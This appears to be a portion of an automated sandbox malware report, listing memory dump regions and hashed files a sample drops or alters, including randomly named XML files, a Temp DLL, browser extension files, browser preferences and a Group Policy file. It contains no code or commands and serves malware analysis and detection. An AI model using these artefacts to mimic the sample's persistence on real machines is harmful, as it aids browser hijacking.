SHA256 8f6e01da86ef5f459ee2206cf4f97cffaecbb52d806602969de2854d9f388ecf
SHA512 a60eb7a25cab8814f598e73163a1865d578f4024b45d1c8cd0ec15ac5f58721c7afcbb8e3d3c302af9582fb775ce784b43dc85e877f8a5c592a74a26f1fd9f6b

memory/1592-114-0x0000000004D30000-0x0000000005084000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a75052bd562f64a317c1e1f6648f26e6
SHA1 1c0c77743a5d042a1df5d11dc51a1ea53b7cbf5f
SHA256 7111c5f00a3f7d388c16148784d62edb4082af73ff72c77590eb2d02ecb4b340
SHA512 0c6fb63080708e8148ce0f1fb10e58dca43daeed3baf7565d5bd0ee0fe8e9b73ea2f65ec651d3a42196c1756a5a2ee2b9528a2675ceb7d05348a9086205048c6

memory/1592-125-0x0000000005830000-0x000000000587C000-memory.dmp

memory/1836-127-0x0000000010000000-0x00000000105CF000-memory.dmp

memory/2040-141-0x0000000004A30000-0x0000000004D84000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 85983f854235f75aa4ab30803a95ffe3
SHA1 76c801440fa1efb03b45377bc319be7535a7f076
SHA256 5ce04bc2d900f46824a909b6bb04d7d2e5ec73bfa3ad2cf206d20bdbd10ed10e
SHA512 4adf44f5dbf9f0e6449011ce07f146ae0c45e2ebed2980aa3282db8482f0f83f186505fe525c923dd2cdfe101f05274cb202c58992ba707d2715c904c05f8116

memory/1836-149-0x00000000025B0000-0x0000000002635000-memory.dmp

memory/2040-171-0x0000000005140000-0x000000000518C000-memory.dmp

C:\$RECYCLE.BIN\S-1-5-18\desktop.ini

MD5 a526b9e7c716b3489d8cc062fbce4005
SHA1 2df502a944ff721241be20a9e449d2acd07e0312
SHA256 e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512 d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 118f72cac1b7617723d3dc5a82a31573
SHA1 0899368188cb21b19547d3cef99692335394ac80
SHA256 16696c23d2ff9b62f54c26cbef0162570fb31a1ff17b2db7fbe6ff8c1e21a03c
SHA512 a20e89b21ff957a7c4d47b66f28546472e52649dd5af04b7504a358cee62d056bea94db4e71d7b75d761d4b962e7cef7501eaa648fb6f037d5a02c1afcf78884

memory/1836-191-0x0000000002E00000-0x0000000002E5D000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 ee3e92b32c3d2645d23d7a6ebbd9cc09
SHA1 b5a138cd6f5cab0c7ca783c037dc2f06bd5ce6b9
SHA256 38fb7fb53014ee5dc95592b7c7a6186bf77bb05c3d612f0a02ba2b587d92ba31
SHA512 5a7c9903866f742d3822bb5eb8f2f9890a25a6e8f81790bc8894aa91a6b51e9c061687e6c503f8b0fb1413d95d4abf97939bac5292bc5f5e4c95e1b7d9c801fa

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Program Files (x86)\hsUwQAlMU\XoMgzde.xml

MD5 c18129109e0eae554f2414680f4e768c
SHA1 dee2564c4dd75ced002950bf95c8d6db4b4025b6
SHA256 ae7b2e8f4357e1602adbd5e35987b245e6cd82a1230b470b6a9a05854954e10d
SHA512 5047f640faedcb3325670018c87ffa0c01e236335ec969f734a3dcfa5795c3df701149f3ba4747350aea540796f6bc69650573cadb149cbebacb9bc46a4b261e

C:\Program Files (x86)\dlfHiRefefjU2\TNLDjta.xml

MD5 ce66999d00c2d2425e8ce7c02e0303d8
SHA1 39d8a88acaddbab6ae31efaf85efe7d843709833
SHA256 05d8d42b3392ea1017a19642e5a4f88f6e364827c694188e4cf96b8043e2c77c
SHA512 d715b7578654158d96e825a2904eebd2cc446196e01839b51ab988869719d716788eef791b03acc9987879657a92284b01525f734de694fc4c3b9ecb795e10ac

C:\ProgramData\nivjmgppGaMJQQVB\DbzOWdt.xml

MD5 161e22b8f872a06fbe45ec4a044ff983
SHA1 c57753bb4e2274a2bf2f97fc55d6005cd477eed3
SHA256 ed326b8e8fdcd063189c8b8cd24691e9aa001eb7646cd2619cc8c1bb6baa8cd2
SHA512 3a9dd39f584cb5201e39f3bfa9b5d1c81bc82b8bc140dee41473b586127f743f9549b321a011b969386e0d8758c58545f749f2ded9e6109b90a141d72687e48e

C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\Tmqpqut.xml

MD5 0aaacce24180ad68f325a7704468c356
SHA1 2f1f35a0110ca5b8f0aacf8d68807e2b48aafa2e
SHA256 45395291b737cd70b7e6273396966cc800ae02d693b90e3d47eebb535b70b965
SHA512 75fd3d9a3f095398d8241847e043f7d542cad758207d5d98cad622a9017a1d26389786b3e081229d2b29ac859f943b9c67b23a4b74e35b9fc362920470f03048

C:\Program Files (x86)\QtKEgKYoTGTqC\EArZmcm.xml

MD5 7bb1468d7b21fe70f4376b84847aa120
SHA1 ada61014a3784f28d64e5bf780544067a7a525dd
SHA256 b9781afc0e2a3b6f34d5870742e2053ac94a07f558f6bfa8e6f72d66cce6f3fa
SHA512 5d4ba1dd0f85a4032cf5f91a0749f62a577f8444463d62bfbce5535a968fc363ac84c38f912704bcfd49c319c3953fa4dc14173c9d2f18fb1b014ad782d5e7c7

C:\Windows\Temp\QqEAMUespgTHJnVz\VXXfDzST\sBYgQOf.dll

MD5 21e3965bd08eabf0ee24dd9d17dc0d5c
SHA1 8680d90f50ed3caf0b617a1cf512c664bdbd7be8
SHA256 570e0b2d996c3151a08c5042555500988b7eca34c2126d335e06da13ce772f4a
SHA512 9b5662e11db22c04c3f4463e493c28b5ef2a7a997e644a6cad8f38d8df2947f8f14b049d0d2136b4e98a53db9db94c5a2ff613b8cdbaa2c7107a46f855c81a3e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ue3bcu6m.default-release\prefs.js

MD5 f7dc7c7d70a598f55a043a021d9d4ae3
SHA1 57b9a388deb2266340e1a5a52f1eeefc515632c6
SHA256 bff64e0b73e9a906a8db680006a97b7cf6f23daf8fdd62742cc93cb152f10d0e
SHA512 884ce09339b1386d9b65dfe0bcc7b5b23f6a6b4202f66a1d3b951434567e69d14286dcf271783be0051c1f56ea585daf3a23a7b57ad80e45b36ed90c96a94dff

memory/1836-536-0x0000000003810000-0x00000000038EA000-memory.dmp

memory/1836-521-0x0000000002E60000-0x0000000002EE2000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 205ecd936f235fdf047756a978c6146e
SHA1 4e8be469ccb3a1dee7381334d44536132e2aa79a
SHA256 ab598fa3b5eb6be5a93a6f954b0d31dece755907ae30a2a6876ebb672ea41ffe
SHA512 938d60e74b741095e2a661d8f13e3c2c3104ac5c128ab67692a2a4e464744d0625d0be155dda3dfe08022d4df1a18a26adeb5c5b33b0f24db7efce61daa7b085

memory/1892-559-0x0000000001320000-0x00000000018EF000-memory.dmp